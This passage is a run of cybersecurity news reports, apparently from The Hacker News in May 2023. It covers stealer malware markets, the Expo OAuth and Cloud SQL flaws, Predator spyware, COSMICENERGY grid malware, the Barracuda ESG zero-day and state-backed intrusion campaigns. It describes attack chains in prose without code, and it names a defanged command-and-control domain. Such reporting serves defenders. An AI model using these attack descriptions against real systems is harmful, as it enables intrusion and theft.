The findings also follow the emergence of several strains of commodity stealer malware like Luca, StrelaStealer, DarkCloud, WhiteSnake, and Invicta Stealer, some of which have been observed propagating via spam emails and fraudulent versions of popular software.
Another notable trend has been the use of YouTube videos to advertise cracked software via compromised channels with millions of subscribers.
Data amassed from stealers can benefit the operators in many ways, allowing them to exploit purposes such as identity theft, financial gain, data breaches, credential stuffing attacks, and account takeovers.
The stolen information can also be sold to other actors, serving as a foundation for follow-on attacks that could range from targeted campaigns to ransomware or extortion attacks.
These developments highlight the continued evolution of stealer malware into a more lethal threat, just as the malware-as-a-service (MaaS) market makes them readily available and lowers the barriers to entry for aspiring cybercriminals.
Indeed, data gathered by Secureworks Counter Threat Unit (CTU) has revealed a "thriving infostealer market," with the volume of stolen logs on underground forums like Russian Market registering a 670% jump between June 2021 and May 2023.
"Russian Market offers five million logs for sale which is around ten times more than its nearest forum rival 2easy," the company said.
"Russian Market is well-established among Russian cybercriminals and used extensively by threat actors worldwide. Russian Market recently added logs from three new stealers, which suggests that the site is actively adapting to the ever-changing e-crime landscape."
The MaaS ecosystem, the increasing sophistication notwithstanding, has also been in a state of flux, with law enforcement actions prompting threat actors to peddle their warez on Telegram.
"What we are seeing is an entire underground economy and supporting infrastructure built around infostealers, making it not only possible but also potentially lucrative for relatively low skilled threat actors to get involved," Don Smith, vice president of Secureworks CTU, said.
"Coordinated global action by law enforcement is having some impact, but cybercriminals are adept at reshaping their routes to market."
Critical OAuth Vulnerability in Expo Framework Allows Account Hijacking
28.5.23 Hacking The Hacker News
A critical security vulnerability has been disclosed in the Open Authorization (OAuth) implementation of the application development framework Expo.io.
The shortcoming, assigned the CVE identifier CVE-2023-28131, has a severity rating of 9.6 on the CVSS scoring system. API security firm Salt Labs said the issue rendered services using the framework susceptible to credential leakage, which could then be used to hijack accounts and siphon sensitive data.
Under certain circumstances, a threat actor could have taken advantage of the flaw to perform arbitrary actions on behalf of a compromised user on various platforms such as Facebook, Google, or Twitter.
Expo, similar to Electron, is an open source platform for developing universal native apps that run on Android, iOS, and the web.
It's worth noting that for the attack to be successful, sites and applications using Expo should have configured the AuthSession Proxy setting for single sign-on (SSO) using a third-party provider such as Google and Facebook.
Put differently, the vulnerability could be leveraged to send the secret token associated with a sign-in provider (e.g., Facebook) to an actor-controlled domain and use it to seize control of the victim's account.
This, in turn, is accomplished by tricking the targeted user into clicking on a specially crafted link that could be sent via traditional social engineering vectors like email, SMS messages, or a dubious website.
Expo, in an advisory, said it deployed a hotfix within hours of responsible disclosure on February 18, 2023. It's also recommended that users migrate from using AuthSession API proxies to directly registering deep link URL schemes with third-party authentication providers to enable SSO features.
"The vulnerability would have allowed a potential attacker to trick a user into visiting a malicious link, logging in to a third-party auth provider, and inadvertently revealing their third-party auth credentials," Expo's James Ide said.
"This was because auth.expo.io used to store an app's callback URL before the user explicitly confirmed they trust the callback URL."
The disclosure follows the discovery of similar OAuth issues in Booking.com (and its sister site Kayak.com) that could have been leveraged to take control of a user's account, gain full visibility into their personal or payment-card data, and perform actions on the victim's behalf.
The findings also come weeks after Swiss cybersecurity company Sonar detailed a path traversal and an SQL injection flaw in the Pimcore enterprise content management system (CVE-2023-28438) that an adversary can abuse to run arbitrary PHP code on the server with the permissions of the webserver.
Sonar, back in March 2023, also revealed an unauthenticated, stored cross-site scripting vulnerability impacting LibreNMS versions 22.10.0 and prior that could be exploited to gain remote code execution when Simple Network Management Protocol (SNMP) is enabled.
Severe Flaw in Google Cloud's Cloud SQL Service Exposed Confidential Data
28.5.23 Vulnerebility The Hacker News
A new security flaw has been disclosed in the Google Cloud Platform's (GCP) Cloud SQL service that could be potentially exploited to obtain access to confidential data.
"The vulnerability could have enabled a malicious actor to escalate from a basic Cloud SQL user to a full-fledged sysadmin on a container, gaining access to internal GCP data like secrets, sensitive files, passwords, in addition to customer data," Israeli cloud security firm Dig said.
Cloud SQL is a fully-managed solution to build MySQL, PostgreSQL, and SQL Server databases for cloud-based applications.
The multi-stage attack chain identified by Dig, in a nutshell, leveraged a gap in the cloud platform's security layer associated with SQL Server to escalate the privileges of a user to that of an administrator role.
The elevated permissions subsequently made it possible to abuse another critical misconfiguration to obtain system administrator rights and take full control of the database server.
From there, a threat actor could access all files hosted on the underlying operating system, enumerate files, and extract passwords, which could then act as a launchpad for further attacks.
"Gaining access to internal data like secrets, URLs, and passwords can lead to exposure of cloud providers' data and customers' sensitive data which is a major security incident," Dig researchers Ofir Balassiano and Ofir Shaty said.
Following responsible disclosure in February 2023, the issue was addressed by Google in April 2023.
The disclosure comes as Google announced the availability of its Automatic Certificate Management Environment (ACME) API for all Google Cloud users to automatically acquire and renew TLS certificates for free.
Predator Android Spyware: Researchers Uncover New Data Theft Capabilities
28.5.23 Android The Hacker News
Security researchers have detailed the inner workings of the commercial Android spyware called Predator, which is marketed by the Israeli company Intellexa (previously Cytrox).
Predator was first documented by Google's Threat Analysis Group (TAG) in May 2022 as part of attacks leveraging five different zero-day flaws in the Chrome web browser and Android.
The spyware, which is delivered by means of another loader component called Alien, is equipped to record audio from phone calls and VoIP-based apps as well as gather contacts and messages, including from Signal, WhatsApp, and Telegram.
Its other functionalities allow it to hide applications and prevent applications from being executed upon rebooting the handset.
"A deep dive into both spyware components indicates that Alien is more than just a loader for Predator and actively sets up the low-level capabilities needed for Predator to spy on its victims," Cisco Talos said in a technical report.
Spyware like Predator and NSO Group's Pegasus are carefully delivered as part of highly-targeted attacks by weaponizing what are called zero-click exploit chains that typically require no interaction from the victims and allow for code execution and privilege escalation.
"Predator is an interesting piece of mercenary spyware that has been around since at least 2019, designed to be flexible so that new Python-based modules can be delivered without the need for repeated exploitation, thus making it especially versatile and dangerous," Talos explained.
Both Predator and Alien are designed to get around security guardrails in Android, with the latter loaded into a core Android process called Zygote to download and launch other spyware modules, counting Predator, from an external server.
It's currently not clear how Alien is activated on an infected device in the first place. However, it's suspected to be loaded from shellcode that's executed by taking advantage of initial-stage exploits.
"Alien is not just a loader but also an executor its multiple threads will keep reading commands coming from Predator and executing them, providing the spyware with the means to bypass some of the Android framework security features," the company said.
The various Python modules associated with Predator make it possible to accomplish a wide array of tasks such as information theft, surveillance, remote access, and arbitrary code execution.
The spyware, which arrives as an ELF binary before setting up a Python runtime environment, can also add certificates to the store and enumerate the contents of various directories on disk if it's running on a device manufactured by Samsung, Huawei, Oppo, or Xiaomi.
That said, there are still many missing pieces that could help complete the attack puzzle. This comprises a main module called tcore and a privilege escalation mechanism dubbed kmem, both of which have remained elusive to obtain thus far.
Cisco Talos theorized that tcore could have implemented other features like geolocation tracking, camera access, and simulating a shutdown to covertly spy on victims.
The findings come as threat actors' use of commercial spyware has witnessed a surge in recent years just as the number of cyber mercenary companies supplying these services are on an upward trajectory.
While these sophisticated tools are intended for exclusive use by governments to counter serious crime and combat national security threats, they have also been abused by customers to surveil on dissidents, human rights activists, journalists, and other members of the civil society.
As a case in point, digital rights group Access Now said that it uncovered evidence of Pegasus targeting a dozen people in Armenia including an NGO worker, two journalists, a United Nations official, and a human rights ombudsperson in Armenia. One of the victims was hacked at least 27 times between October 2020 and July 2021.
"This is the first documented evidence of the use of Pegasus spyware in an international war context," Access Now said, adding it began an investigation after Apple sent notifications to the individuals in question that they may have been a victim of state-sponsored spyware attacks in November 2021.
There are no conclusive links that connect the spyware use to a specific government agency in either Armenia or Azerbaijan. It's worth noting that Armenia was outed as a customer of Intellexa by Meta in December 2021 in attacks aimed at politicians and journalists in the nation.
What's more, cybersecurity company Check Point earlier this year disclosed that various Armenian entities have been infected with a Windows backdoor referred to as OxtaRAT as part of an espionage campaign aligned with Azerbaijani interests.
In a more unusual turn of events, The New York Times and The Washington Post reported this week that the Mexican government may be spying on itself by using Pegasus against a senior official in charge of investigating alleged military abuses.
Mexico is also the first and most prolific user of Pegasus, despite its promises to cease the illegal use of the notorious spyware.
New COSMICENERGY Malware Exploits ICS Protocol to Sabotage Power Grids
28.5.23 Virus The Hacker News
A new strain of malicious software that's engineered to penetrate and disrupt critical systems in industrial environments has been unearthed.
Google-owned threat intelligence firm Mandiant dubbed the malware COSMICENERGY, adding it was uploaded to the VirusTotal public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild.
"The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said.
COSMICENERGY is the latest addition to specialized malware like Stuxnet, Havex, Triton, IRONGATE, BlackEnergy2, Industroyer, and PIPEDREAM, which are capable of sabotaging critical systems and wreaking havoc.
Mandiant said that there are circumstantial links that it may have been developed as a red teaming tool by Russian telecom firm Rostelecom-Solar to simulate power disruption and emergency response exercises that were held in October 2021.
This raises the possibility that the malware was either developed to recreate realistic attack scenarios against energy grid assets to test defenses or another party reused code associated with the cyber range.
The second alternative is not unheard of, especially in light of the fact that threat actors are known to adapt and repurpose legitimate red team and post-exploitation tools for malicious ends.
COSMICENERGY's features are comparable to that of Industroyer which has been attributed to the Kremlin-backed Sandworm group owing to its ability to exploit an industrial communication protocol called IEC-104 to issue commands to RTUs.
"Leveraging this access, an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption," Mandiant said.
This is accomplished by means of two components called PIEHOP and LIGHTWORK, which are two disruption tools written in Python and C++, respectively, to transmit the IEC-104 commands to the connected industrial equipment.
Another notable aspect of the industrial control system (ICS) malware is the lack of intrusion and discovery capabilities, meaning it requires the operator to perform an internal reconnaissance of the network to determine the IEC-104 device IP addresses to be targeted.
To pull off an attack, a threat actor would therefore have to infect a computer within the network, find a Microsoft SQL Server that has access to the RTUs, and obtain its credentials.
PIEHOP is then run on the machine to upload LIGHTWORK to the server, which sends disruptive remote commands to modify the state of the units (ON or OFF) over TCP. It also immediately deletes the executable after issuing the instructions.
The fact that an ICS malware family has been identified prior to it being actively used in real-world attacks makes it an unusual find, Daniel Kapellmann Zafra, analysis manager at Google Cloud's Mandiant Intelligence division, told The Hacker News.
"While COSMICENERGY's capabilities are not significantly different from previous OT malware families', its discovery highlights several notable developments in the OT threat landscape," Mandiant said.
"The discovery of new OT malware presents an immediate threat to affected organizations, since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon."
"One of the main lessons from COSMICENERGY is that defenders should be familiar with prior OT [operational technology] malware families, their capabilities, and how they work," Kapellmann Zafra said.
"Knowledge about this can help defenders to sustain threat hunting and detection programs that rigorously look for behaviors that are known to be suspicious in OT networks."
Barracuda Warns of Zero-Day Exploited to Breach Email Security Gateway Appliances
28.5.23 Exploit The Hacker News
Email protection and network security services provider Barracuda is warning users about a zero-day flaw that it said has been exploited to breach the company's Email Security Gateway (ESG) appliances.
The zero-day is being tracked as CVE-2023-2868 and has been described as a remote code injection vulnerability affecting versions 5.1.3.001 through 9.2.0.006.
The California-headquartered firm said the issue is rooted in a component that screens the attachments of incoming emails.
"The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives)," according to an advisory from the NIST's national vulnerability database.
"The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product."
The shortcoming, Barracuda noted, was identified on May 19, 2023, prompting the company to deploy a patch across all ESG devices worldwide a day later. A second fix was released on May 21 as part of its "containment strategy."
Additionally, the company's investigation uncovered evidence of active exploitation of CVE-2023-2868, resulting in unauthorized access to a "subset of email gateway appliances."
The company, which has over 200,000 global customers, did not disclose the scale of the attack. It said affected users have been directly contacted with a list of remedial actions to take.
Barracuda has also urged its customers to review their environments, adding it's still actively monitoring the situation.
The identity of the threat actors behind the attack is currently not known, but Chinese and Russian hacking groups have been observed deploying bespoke malware on vulnerable Cisco, Fortinet, and SonicWall devices in recent months.
The development comes as Defiant alerted of large-scale exploitation of a now-fixed cross-site scripting (XSS) flaw in a plugin called Beautiful Cookie Consent Banner (CVSS score: 7.2) that's installed on over 40,000 sites.
The vulnerability offers unauthenticated attackers the ability to inject malicious JavaScript to a website, potentially allowing redirects to malvertising sites as well as the creation of rogue admin users, resulting in site takeovers.
The WordPress security company said it "blocked nearly 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023, and attacks are ongoing."
Update#
The U.S. Cybersecurity and Infrastructure Security Agency on Friday added the remote code injection vulnerability impacting Barracuda ESG appliances to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by June 16, 2023.
Dark Frost Botnet Launches Devastating DDoS Attacks on Gaming Industry
25.5.23 BotNet The Hacker News
A new botnet called Dark Frost has been observed launching distributed denial-of-service (DDoS) attacks against the gaming industry.
"The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News.
Targets include gaming companies, game server hosting
providers, online streamers, and even other gaming community members with whom the threat actor has interacted directly.
As of February 2023, the botnet comprises 414 machines running various instruction set architectures such as ARMv4, x86, MIPSEL, MIPS, and ARM7.
Botnets are usually made up of a vast network of compromised devices around the world. The operators tend to use the enslaved hosts to mine cryptocurrency, steal sensitive data, or harness the collective internet bandwidth from these bots to knock down other websites and internet servers by flooding the targets with junk traffic.
Dark Frost represents the latest iteration of a botnet that appears to have been stitched together by stealing source code from various botnet malware strains such as Mirai, Gafgyt, and QBot.
Akamai, which reverse-engineered the botnet after flagging it on February 28, 2023, pegged its attack potential at approximately 629.28 Gbps through a UDP flood attack. The threat actor is believed to be active since at least May 2022.
"What makes this particular case interesting is that the actor behind these attacks has published live recordings of their attacks for all to see," the web infrastructure company said.
"The actor was observed boasting about their achievements on social media, utilizing the botnet for petty online disputes, and even leaving digital signatures on their binary file."
The adversary has further set up a Discord channel to facilitate attacks in exchange for money, indicating their financial motivations and plans to flesh it out as a DDoS-for-hire service.
Dark Frost constitutes a modern example of how easy it is for novice cybercriminals with rudimentary coding skills to spring into action using already available malware to inflict significant damage on enterprises.
"The reach that these threat actors can have is staggering despite the lack of novelty in their techniques," West said. "Although not the most advanced or mind-bending adversary, the Dark Frost botnet has still managed to accumulate hundreds of compromised devices to do its bidding."
Zyxel Issues Critical Security Patches for Firewall and VPN Products
25.5.23 Vulnerebility The Hacker News
Zyxel has released software updates to address two critical security flaws affecting select firewall and VPN products that could be abused by remote attackers to achieve code execution.
Both the flaws CVE-2023-33009 and CVE-2023-33010 are buffer overflow vulnerabilities and are rated 9.8 out of 10 on the CVSS scoring system.
A brief description of the two issues is below -
CVE-2023-33009 - A buffer overflow vulnerability in the notification function that could enable an unauthenticated attacker to cause a denial-of-service (DoS) condition and remote code execution.
CVE-2023-33010 - A buffer overflow vulnerability in the ID processing function that could enable an unauthenticated attacker to cause a denial-of-service (DoS) condition and remote code execution.
The following devices are impacted -
ATP (versions ZLD V4.32 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2)
USG FLEX (versions ZLD V4.50 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2)
USG FLEX50(W) / USG20(W)-VPN (versions ZLD V4.25 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2)
VPN (versions ZLD V4.30 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2), and
ZyWALL/USG (versions ZLD V4.25 to V4.73 Patch 1, patched in ZLD V4.73 Patch 2)
Security researchers from TRAPA Security and STAR Labs SG have been credited with discovering and reporting the flaws.
UPCOMING WEBINAR
Zero Trust + Deception: Learn How to Outsmart Attackers!
Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!
Save My Seat!
The advisory comes less than a month after Zyxel shipped fixes for another critical security flaw in its firewall devices that could be exploited to achieve remote code execution on affected systems.
The issue, tracked as CVE-2023-28771 (CVSS score: 9.8), was also credited to TRAPA Security, with the networking equipment maker blaming it on improper error message handling. It has since come under active exploitation by threat actors associated with the Mirai botnet.
New PowerExchange Backdoor Used in Iranian Cyber Attack on UAE Government
25.5.23 Virus The Hacker News
An unnamed government entity associated with the United Arab Emirates (U.A.E.) was targeted by a likely Iranian threat actor to breach the victim's Microsoft Exchange Server with a "simple yet effective" backdoor dubbed PowerExchange.
According to a new report from Fortinet FortiGuard Labs, the intrusion relied on email phishing as an initial access pathway, leading to the execution of a .NET executable contained with a ZIP file attachment.
The binary, which masquerades as a PDF document, functions as a dropper to execute the final payload, which then launches the backdoor.
PowerExchange, written in PowerShell, employs text files attached to emails for command-and-control (C2) communication. It allows the threat actor to run arbitrary payloads and upload and download files from and to the system.
The custom implant achieves this by making use of the Exchange Web Services (EWS) API to connect to the victim's Exchange Server and uses a mailbox on the server to send and receive encoded commands from its operator.
"The Exchange Server is accessible from the internet, saving C2 communication to external servers from the devices in the organizations," Fortinet researchers said. "It also acts as a proxy for the attacker to mask himself."
That said, it's currently not known how the threat actor managed to obtain the domain credentials to connect to the target Exchange Server.
Fortinet's investigation also uncovered Exchange servers that were backdoored with several web shells, one of which is called ExchangeLeech (aka System.Web.ServiceAuthentication.dll), to achieve persistent remote access and steal user credentials.
PowerExchange is suspected to be an upgraded version of TriFive, which was previously used by the Iranian nation-stage actor APT34 (aka OilRig) in intrusions targeting government organizations in Kuwait.
Furthermore, communication via internet-facing Exchange servers is a tried-and-tested tactic adopted by the OilRig actors, as observed in the case of Karkoff and MrPerfectionManager.
"Using the victim's Exchange server for the C2 channel allows the backdoor to blend in with benign traffic, thereby ensuring that the threat actor can easily avoid nearly all network-based detections and remediations inside and outside the target organization's infrastructure," the researchers said.
Alert: Brazilian Hackers Targeting Users of Over 30 Portuguese Banks
25.5.23 Hacking The Hacker News
A Brazilian threat actor is targeting more than 30 Portuguese financial institutions with information-stealing malware as part of a long-running campaign that commenced in 2021.
"The attackers can steal credentials and exfiltrate users' data and personal information, which can be leveraged for malicious activities beyond financial gain," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a new report shared with The Hacker News.
The cybersecurity firm, which began tracking "Operation Magalenha" earlier this year, said the intrusions culminate in the deployment of two variants of a backdoor called PeepingTitle so as to "maximize attack potency."
The links to Brazil stem from the use of the Brazilian-Portuguese language within the detected artifacts as well as source code overlaps with another banking trojan known as Maxtrilha, which was first disclosed in September 2021.
PeepingTitle, like Maxtrilha, is written in the Delphi programming language and is equipped to grant the attacker full control over the compromised hosts as well as capture screenshots and drop additional payloads.
The attack chains begin with phishing emails and rogue websites hosting fake installers for popular software that are engineered to launch a Visual Basic Script responsible for executing a malware loader. The loader subsequently downloads and executes the PeepingTitle backdoors.
PeepingTitle monitors users' web browsing activity, and if a browser tab matching one of the target financial institutions is opened, it exfiltrates screen captures and stages further malware executables from a remote server.
This is achieved by comparing the window title to a predefined set of strings related to targeted organizations, but not before transforming it into lowercase string san any whitespace characters.
"With the first PeepingTitle variant capturing the entire screen, and the second capturing each window a user interacts with, this malware duo provides the threat actor with a detailed insight into user activity," the researchers explained.
An important aspect of Magalenha is the shift from DigitalOcean and Dropbox in 2022 to Timeweb Cloud, a Russian cloud service provider that has a more lenient approach towards infrastructure abuse, for malware hosting and command-and-control.
The sophisticated hacking effort represents the latest iteration in a long line of financially motivated malware campaigns originating from Latin America. Earlier this March, Metabase Q uncovered a Mispadu attack wave targeting Bolivia, Chile, Mexico, Peru, and Portugal.
"Operation Magalenha indicates the persistent nature of the Brazilian threat actors," the researchers said. "These groups represent an evolving threat to organizations and individuals in their target countries and have demonstrated a consistent capacity to update their malware arsenal and tactics, allowing them to remain effective in their campaigns."
"Their capacity to orchestrate attacks in Portuguese- and Spanish-speaking countries in Europe, Central, and Latin America suggests an understanding of the local financial landscape and a willingness to invest time and resources in developing targeted campaigns."
Buhti Ransomware Gang Switches Tactics, Utilizes Leaked LockBit and Babuk Code
25.5.23 Ransomware The Hacker News
The threat actors behind the nascent Buhti ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems.
"While the group doesn't develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec said in a report shared with The Hacker News.
The cybersecurity firm is tracking the cybercrime group under the name Blacktail. Buhti was first highlighted by Palo Alto Networks Unit 42 in February 2023, describing it as a Golang ransomware targeting the Linux platform.
Later that same month, Bitdefender revealed the use of a Windows variant that was deployed against Zoho ManageEngine products that were vulnerable to critical remote code execution flaws (CVE-2022-47966).
The operators have since been observed swiftly exploiting other severe bugs impacting IBM's Aspera Faspex file exchange application (CVE-2022-47986) and PaperCut (CVE-2023-27350) to drop the ransomware.
The latest findings from Symantec show that Blacktail's modus operandi might be changing, what with the actor leveraging modified versions of the leaked LockBit 3.0 and Babuk ransomware source code to target Windows and Linux, respectively.
Both Babuk and LockBit have had its ransomware source code published online in September 2021 and September 2022, spawning multiple imitators.
One notable cybercrime group that's already using the LockBit ransomware builder is the Bl00dy Ransomware Gang, which was recently spotlighted by U.S. government agencies as exploiting vulnerable PaperCut servers in attacks against the education sector in the country.
Despite the rebranding changes, Blacktail has been observed utilizing a custom data exfiltration utility written in Go that's designed to steal files with specific extensions in the form of a ZIP archive prior to encryption.
"While the reuse of leaked payloads is often the hallmark of a less-skilled ransomware operation, Blacktail's general competence in carrying out attacks, coupled with its ability to recognize the utility of newly discovered vulnerabilities, suggests that it is not to be underestimated," Symantec said.
Ransomware continues to pose a persistent threat for enterprises. Fortinet FortiGuard Labs, earlier this month, detailed a Go-based ransomware family called Maori that's specifically designed to run on Linux systems.
While the use of Go and Rust signals an interest on part of threat actors to develop "adaptive" cross-platform ransomware and maximize the attack surface, it's also a sign of an ever-evolving cybercrime ecosystem where new techniques are adopted on a continual basis.
"Major ransomware gangs are borrowing capabilities from either leaked code or code purchased from other cybercriminals, which may improve the functionality of their own malware," Kaspersky noted in its ransomware trends report for 2023.
Indeed, according to Cyble, a new ransomware family dubbed Obsidian ORB takes a leaf out of Chaos, which has also been the foundation for other ransomware strains like BlackSnake and Onyx.
What makes the ransomware stand out is that it employs a rather distinctive ransom payment method, demanding that victims pay the ransom through gift cards as opposed to cryptocurrency payments.
"This approach is effective and convenient for threat actors (TAs) as they can modify and customize the code to their preferences," the cybersecurity firm said.
China's Stealthy Hackers Infiltrate U.S. and Guam Critical Infrastructure Undetected
25.5.23 BigBrothers The Hacker News
A stealthy China-based group managed to establish a persistent foothold into critical infrastructure organizations in the U.S. and Guam without being detected, Microsoft and the "Five Eyes" nations said on Wednesday.
The tech giant's threat intelligence team is tracking the activity, which includes post-compromise credential access and network system discovery, under the name Volt Typhoon.
The state-sponsored actor is geared towards espionage and information gathering, with the cluster active since June 2021 and obscuring its intrusion footprint by taking advantage of tools already installed or built into infected machines.
Some of the prominent sectors targeted include communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education.
The company further assessed with moderate confidence that the campaign is "pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises."
A defining characteristic of the attacks is the "strong emphasis" on staying under the radar by exclusively relying on living-off-the-land (LotL) techniques to exfiltrate data from local web browser applications and leverage stolen credentials for backdoor access.
The main goal is to sidestep detection by harmonizing with regular Windows system and network activities, indicating that the threat actor is deliberately keeping a low profile to gain access to sensitive information.
"In addition, Volt Typhoon tries to blend into normal network activity by routing traffic through compromised small office and home office (SOHO) network equipment, including routers, firewalls, and VPN hardware," Microsoft said.
Another unusual tradecraft is the use of custom versions of open source tools to establish a command-and-control (C2) channel over proxy as well as other organizations' compromised servers in its C2 proxy network to hide the source of the attacks.
In one incident reported on by the New York Times, the adversarial collective breached telecommunications networks on the island of Guam, a sensitive U.S. military outpost in the Pacific Ocean, and installed a malicious web shell.
The initial entry vector involves exploiting internet-facing Fortinet FortiGuard devices by means of an unknown zero-day flaw, although Volt Typhoon has also been observed weaponizing flaws in Zoho ManageEngine servers. The access is then abused to steal credentials and break into other devices on the network.
The Windows makers also noted it directly notified targeted or compromised customers and provided them with the necessary information to secure their environments.
It, however, warned that it could be "particularly challenging" to mitigate such risks when threat actors make use of valid accounts and living-off-the-land binaries (LOLBins) to pull off their attacks.
Secureworks, which is monitoring the threat group under the name Bronze Silhouette, said it has "demonstrated careful consideration for operational security [...] and reliance on compromised infrastructure to prevent detection and attribution of its intrusion activity."
The development also comes as Reuters disclosed that Chinese hackers targeted Kenya's government in a far-reaching three-year-long series of attacks against key ministries and state institutions in an alleged attempt to obtain information about the "debt owed to Beijing by the East African nation."
The digital offensive is suspected to have been carried out by BackdoorDiplomacy (aka APT15, Playful Taurus, or Vixen Panda), which is known to target government and diplomatic entities across North America, South America, Africa, and the Middle East at least since 2010.
Iranian Agrius Hackers Targeting Israeli Organizations with Moneybird Ransomware
25.5.23 BigBrothers The Hacker News
The Iranian threat actor known as Agrius is leveraging a new ransomware strain called Moneybird in its attacks targeting Israeli organizations.
Agrius, also known as Pink Sandstorm (formerly Americium), has a track record of staging destructive data-wiping attacks aimed at Israel under the guise of ransomware infections.
Microsoft has attributed the threat actor to Iran's Ministry of Intelligence and Security (MOIS), which also operates MuddyWater. It's known to be active since at least December 2020.
In December 2022, the hacking crew was attributed to a set of attempted disruptive intrusions that were directed against diamond industries in South Africa, Israel, and Hong Kong.
These attacks involved the use of a .NET-based wiper-turned-ransomware called Apostle and its successor known as Fantasy. Unlike Apostle, Moneybird is programmed in C++.
"The use of a new ransomware, written in C++, is noteworthy, as it demonstrates the group's expanding capabilities and ongoing effort in developing new tools," Check Point researchers Marc Salinas Fernandez and Jiri Vinopal said.
The infection sequence begins with the exploitation of vulnerabilities within internet-exposed web servers, leading to the deployment of a web shell referred to as ASPXSpy.
In the subsequent steps, the web shell is used as a conduit to deliver publicly-known tools in order to perform reconnaissance of the victim environment, move laterally, harvest credentials, and exfiltrate data.
Also executed on the compromised host is the Moneybird ransomware, which is engineered to encrypt sensitive files in the "F:\User Shares" folder and drop a ransom note urging the company to contact them within 24 hours or risk getting their stolen information leaked.
"The use of a new ransomware demonstrates the actor's additional efforts to enhance capabilities, as well as hardening attribution and detection efforts," the researchers said. "Despite these new 'covers,' the group continues to follow its usual behavior and utilize similar tools and techniques as before."
Agrius is far from the only Iranian state-sponsored group to engage in cyber operations targeting Israel. A report from Microsoft last month uncovered MuddyWater's collaboration with another cluster dubbed Storm-1084 (aka DEV-1084) to deploy the DarkBit ransomware.
The findings also come as ClearSky disclosed that no fewer than eight websites associated with shipping, logistics, and financial services companies in Israel were compromised as part of a watering hole attack orchestrated by the Iran-linked Tortoiseshell group.
In a related development, Proofpoint revealed that regional managed service providers (MSPs) within Israel have been targeted by MuddyWater as part of a phishing campaign designed to initiate supply chain attacks against their downstream customers.
The enterprise security firm further highlighted escalating threats to small and medium-sized businesses (SMBs) from sophisticated threat groups, which have been observed leveraging compromised SMB infrastructure for phishing campaigns and financial theft.
GUAC 0.1 Beta: Google's Breakthrough Framework for Secure Software Supply Chains
25.5.23 Security The Hacker News
Google on Wednesday announced the 0.1 Beta version of GUAC (short for Graph for Understanding Artifact Composition) for organizations to secure their software supply chains.
To that end, the search giant is making available the open source framework as an API for developers to integrate their own tools and policy engines.
GUAC aims to aggregate software security metadata from different sources into a graph database that maps out relationships between software, helping organizations determine how one piece of software affects another.
"Graph for Understanding Artifact Composition (GUAC) gives you organized and actionable insights into your software supply chain security position," Google says in its documentation.
"GUAC ingests software security metadata, like SBOMs, and maps out the relationship between software so that you can fully understand your software security position."
In other words, it's designed to bring together Software Bill of Materials (SBOM) documents, SLSA attestations, OSV vulnerability feeds, deps.dev insights, and a company's internal private metadata to help create a better picture of the risk profile and visualize the relationships between artifacts, packages, and repositories.
With such a setup in place, the goal is to tackle high-profile supply chain attacks, generate a patch plan, and swiftly respond to security compromises.
"For example, GUAC can be used to certify that a builder is compromised (e.g., via credential leakage or ingestion of malware) and then query for affected artifacts," Google said.
"This enables the [chief information security officer] to easily create a policy to forbid use of any software from within the blast radius."
Iranian Tortoiseshell Hackers Targeting Israeli Logistics Industry
25.5.23 BigBrothers The Hacker News
At least eight websites associated with shipping, logistics, and financial services companies in Israel were targeted as part of a watering hole attack.
Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456.
"The infected sites collect preliminary user information through a script," ClearSky said in a technical report published Tuesday. Most of the impacted websites have been stripped of the rogue code.
Tortoiseshell is known to be active since at least July 2018, with early attacks targeting IT providers in Saudi Arabia. It has also been observed setting up fake hiring websites for U.S. military veterans in a bid to trick them into downloading remote access trojans.
That said, this is not the first time Iranian activity clusters have set their sights on the Israeli shipping sector with watering holes.
The attack method, also called strategic website compromises, works by infecting a website that's known to be commonly visited by a group of users or those within a specific industry to enable the distribution of malware.
In August 2022, an emerging Iranian actor named UNC3890 was attributed to a watering hole hosted on a login page of a legitimate Israeli shipping company that's designed to transmit preliminary data about the logged-in user to an attacker-controlled domain.
The latest intrusions documented by ClearSky show that the malicious JavaScript injected into the websites functions in a similar manner, collecting information about the system and sending it to a remote server.
The JavaScript code further attempts to determine the user's language preference, which ClearSky said could be "useful to the attacker to customize their attack based on the user's language."
On top of that, the attacks also make use of a domain named jquery-stack[.]online for command-and-control (C2). The goal is to fly under the radar by impersonating the legitimate jQuery JavaScript framework.
The development comes as Israel continues to be the most prominent target for Iranian state-sponsored crews. Microsoft, earlier this month, highlighted their new approach of combining "offensive cyber operations with multi-pronged influence operations to fuel geopolitical change in alignment with the regime's objectives."
Data Stealing Malware Discovered in Popular Android Screen Recorder App
24.5.23 Android The Hacker News
Google has removed a screen recording app named "iRecorder - Screen Recorder" from the Play Store after it was found to sneak in information stealing capabilities nearly a year after the app was published as an innocuous app.
